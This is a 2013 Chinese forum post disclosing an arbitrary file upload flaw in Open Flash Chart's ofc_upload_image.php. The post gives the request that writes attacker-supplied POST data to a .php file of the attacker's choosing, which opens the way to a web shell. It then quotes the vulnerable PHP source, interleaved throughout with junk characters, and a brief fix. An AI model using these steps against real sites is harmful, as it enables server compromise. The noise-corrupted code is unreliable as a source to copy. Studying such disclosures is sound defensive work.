POST 数据漏洞文件执行任意后缀文件保存
8 m- ^9 K) m* M# |' t4 K! u 漏洞文件/chart/php-ofc-library/ofc_upload_image.php
5 K0 R( A3 g& v5 y
# B+ m. p! Z" B+ J. I8 E% k5 ?利用:
% n% _2 P% B: v/chart/php-ofc-library/ofc_upload_image.php?name=hfy.php hfy.php 文件名
6 ]- `0 k8 k! ]+ B S2 W! X0 p% G/ [. [) o( k# b( j# q4 A! h' x- g
Post任意数据
& {% ~ @6 A" q保存位置http://localhost/chart/tmp-upload-images/hfy.php
8 m5 M/ u" J$ F+ `
" x4 p5 U& g+ r" v2 r% D
) M! ~) u& M" Y# p8 N E5 o( Y最新版wss漏洞文件,即使是收费版本也有的,在新浪商店部署的demo~
- O1 Q, N, T ~) s z. l7 o. p' ~! `# D! P
<?php; j8 y' l1 q. U( i2 @
; F# g2 T! U& {9 K3 E
//
, ^( X1 m' p3 R// In Open Flash Chart -> save_image debug mode, you
5 Z7 \$ @$ x* C# y" A// will see the 'echo' text in a new window.
9 d8 B, B/ q0 H: E. ?//
8 K/ V" v2 Y) ?0 g6 n2 o% v& S* f" G) b
/*4 \% H1 [5 @" A
# }8 ^6 f, ^( N7 |1 i
print_r( $_GET );
/ w+ {, Q& K a+ \: B+ r* g. Bprint_r( $_POST );/ O8 C ^& I* X3 _* z
print_r( $_FILES );
3 w2 G; M6 Q y" s2 d9 A$ \2 m1 P) o5 Q; T( G9 }9 p T6 W c7 J
print_r( $GLOBALS );
# r( m! I% d0 O$ `/ g1 Y% c4 wprint_r( $GLOBALS["HTTP_RAW_POST_DATA"] );
# v" r: M- G$ B2 a
4 D) J4 H- N0 k9 n5 \1 I) F& w*/* Q0 ]+ V1 S4 r6 Q' N: h
// default path for the image to be stored //4 ~) V5 c& R& H# R/ e/ E
$default_path = '../tmp-upload-images/';
N4 W2 y" d3 a+ d+ b" @7 L
8 D+ v, _# |1 E$ W/ f8 t. B' Uif (!file_exists($default_path)) mkdir($default_path, 0777, true);
8 x- ]& H, a+ P' k$ G) S2 t" _$ q
// full path to the saved image including filename //
8 D! H7 G9 E0 F2 ^! V! v' n: M$destination = $default_path . basename( $_GET[ 'name' ] );
7 l5 n2 ]# x5 _& U/ A2 ^2 N3 |: M
echo 'Saving your image to: '. $destination;
9 t, ~" z( o) H// print_r( $_POST );
: _( H+ b9 @: ]1 }) @! K// print_r( $_SERVER );
# A# n& a# Q! [0 b d// echo $HTTP_RAW_POST_DATA;4 w7 f" @- E) J+ [
0 ^. I# A8 Z2 Z$ P; ], `
//
: b4 j9 e' v0 b6 R/ S) K/ L) A// POST data is usually string data, but we are passing a RAW .png5 |! |+ k" }; Y! l
// so PHP is a bit confused and $_POST is empty. But it has saved
' c6 {/ |9 [% K- A0 K2 l// the raw bits into $HTTP_RAW_POST_DATA
, ?- Y! w9 V' Y4 w( e- g//) c1 n) f6 P5 `: p9 e
- ^5 m% @7 v- v7 L. J2 O6 E8 {
$jfh = fopen($destination, 'w') or die("can't open file");/ Z7 i+ `. q; V3 S
fwrite($jfh, $HTTP_RAW_POST_DATA);/ s. }7 c2 \: [& C) D e0 G
fclose($jfh);5 r a+ l9 z( R; W' C
% W, l% I5 P. o1 {* M- {' t7 D3 a$ ~//
5 z& F& \, N% R9 r# e5 E// LOOK:/ ]; M6 U. D. z, o+ g
//
7 J) m2 \, b1 z; Mexit();
. D6 Q2 l3 p& g2 D+ ^. v# G8 D, E/ j//+ f" \0 T% L- b5 f" F' t7 G5 R; x) M
// PHP5:& }& U2 E1 d& ^- K
//
7 @3 r( r4 h/ ]
+ w& ^9 ~8 R( x$ ^8 Z8 k$ R1 [7 q4 l% w1 a( I/ ]! k* L/ x
// default path for the image to be stored // |8 z8 X2 Q( a9 u' c4 f
$default_path = 'tmp-upload-images/';
8 j7 [' O/ p' M) p0 W. ]
3 B5 v8 \" \9 k' _/ y; [" Wif (!file_exists($default_path)) mkdir($default_path, 0777, true);
; P& |8 U2 |6 k% W, R) ]9 V" B1 ~7 `0 `) C1 a$ ~# }
// full path to the saved image including filename //
9 G& N5 ?3 _ P9 K$destination = $default_path . basename( $_FILES[ 'Filedata' ][ 'name' ] );
- s+ C3 U% G, C/ Y" U6 X
4 J: Z4 u5 [ _: R: E- Z3 C// move the image into the specified directory //" ]1 S; w# c7 V- Z( o4 l s& m
if (move_uploaded_file($_FILES[ 'Filedata' ][ 'tmp_name' ], $destination)) {
9 y F: p9 ~( P% [0 {9 W c- H echo "The file " . basename( $_FILES[ 'Filedata' ][ 'name' ] ) . " has been uploaded;";! S( d; b9 C& e1 b
} else {/ w6 A$ Z; b# [
echo "FILE UPLOAD FAILED";' m' |; J$ h' J- \( V. a
}3 z9 I; t' X6 m$ u0 X) \" P3 \( T
. U9 W1 a0 L0 Y6 s
2 V( {4 _4 m% b% O' W, U?>
& R4 C3 r) s7 z* y" I6 f/ @* a' A3 L
0 J) i8 p, w# n7 K" l7 Y
! @ x8 s9 v" @) D, Y) h$ Q
( u J! n; i$ G9 w( s# Q
- q$ m& T- f( V
. M5 c+ a( |6 d+ V: M修复方案: + J" r1 U+ O f2 R
这个漏洞文件就是个杯具,怎么破,加权限验证,后缀等验证~,自己搞 1 a! a& h! T% b/ e3 {
" e3 {6 h5 M* t# [* n: r" ^* B7 i* v# O# U
$ o& a- U( @- W( e( C
# K0 M# X2 }* B$ X) E |
发表于 2013-2-23 12:38:58
收藏
支持
反对